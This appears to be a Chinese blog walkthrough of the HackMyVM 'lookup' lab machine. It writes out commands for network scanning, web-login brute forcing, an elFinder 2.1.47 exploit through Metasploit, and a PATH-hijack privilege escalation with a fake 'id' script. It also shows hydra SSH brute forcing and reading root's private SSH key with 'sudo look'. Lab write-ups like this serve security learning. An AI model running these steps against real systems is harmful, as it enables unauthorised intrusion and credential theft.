当前位置: 首页 > news >正文

hackmyvm-lookup

arp-scan -l

nmap -sS -v 192.168.222.209

gobuster dir -u http://192.168.222.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404

发现了一处dns解析,在/etc/hosts中添加

192.168.222.209 lookup.hmv

发现可以访问,是一处登录框

gobuster dir -u http://lookup.hmv -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -b 301,401,403,404

漏洞发现

whatweb http://lookup.hmv

抓包,爆破

得到:username=jose&password=password123

跳转到http://files.lookup.hmv/,在hosts中添加这个域名

是一个elfinder 管理器

得到版本信息v2.1.47

msfconsole

set RHOSTS files.lookup.hmv

运行,进入shell环境(shell -t)

搜索具备SUID权限的程序

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} ;

find / -user root -perm -4000 -print 2>/dev/null

我们需要关注/usr/sbin/pwm,它正试图执行id命令来提取用户名和用户id。出现问题是因为它找不到.passwords文件,因为它位于“think”用户的主目录中,并且路径不同。

/usr/bin/script -qc /bin/bash /dev/null:启动一个新的 Bash shell

#!/bin/bash

echo "uid=33(think) gid=33(think) groups=33(think)"

开启http服务将id文件传进去

伪造id

PATH=/tmp:$PATH

chmod +x id

运行/usr/sbin/pwm

可以看到我们已经拿到/home/think/.password的内容

将跑出来的内容保存到本地pass.txt

hydra -l think -P pass.txt ssh://192.168.222.209 -V -I

ssh think@192.168.222.209

登录成功

sudo -l

sudo look '' /root/.ssh/id_rsa

将私钥完整粘贴到本地文件id中

使用 ​chmod​ 命令将私钥文件的权限设置为 ​600:

chmod 600 id

验证权限是否已更改:

ls -l id

连接root用户的ssh

ssh root@192.168.222.209 -i id

相关文章:

  • Linux中查找标准库函数的定义
  • MongoDB未授权访问漏洞
  • 个人博客系统 --- 测试报告
  • 【js逆向】某酒店模拟登录
  • 【蓝桥杯】真题 2386染色时间 (优先队列BFS)
  • 智慧教育云平台支持下的学生自主学习能力培养策略研究
  • dfs刷题矩阵搜索问题
  • 深入理解Java虚拟机(学习笔记)
  • 开源视频剪辑工具,无损编辑更高效
  • 车道保持中车道线识别
  • XSS 攻击向量与绕过技巧
  • OpenCV的基本用法全解析
  • 【深度学习入门_机器学习理论】梯度提升决策树(GBDT)
  • C语言-状态模式详解与实践 - OTA升级状态机
  • 计算机网络层超全解析:从IP协议到路由算法
  • .gitignore使用指南
  • el-select 可搜索下拉框 在ios、ipad 无法唤出键盘,造成无法输入
  • Nginx请求头Hos头攻击
  • 【YOLO项目】毕设大作业之车道线检测
  • 【Linux系统】Linux权限讲解!!!超详细!!!
  • 荣盛发展股东所持1.17亿股将被司法拍卖,起拍价约1.788亿元
  • 国务院任免国家工作人员:颜清辉任人社部副部长
  • 范宇任上海宝山区副区长
  • 欢迎回家!神十九返回舱成功着陆
  • 北京发布今年第四轮拟供商品住宅用地清单,共计5宗22公顷
  • 新华保险一季度净赚58.82亿增19%,保费收入增28%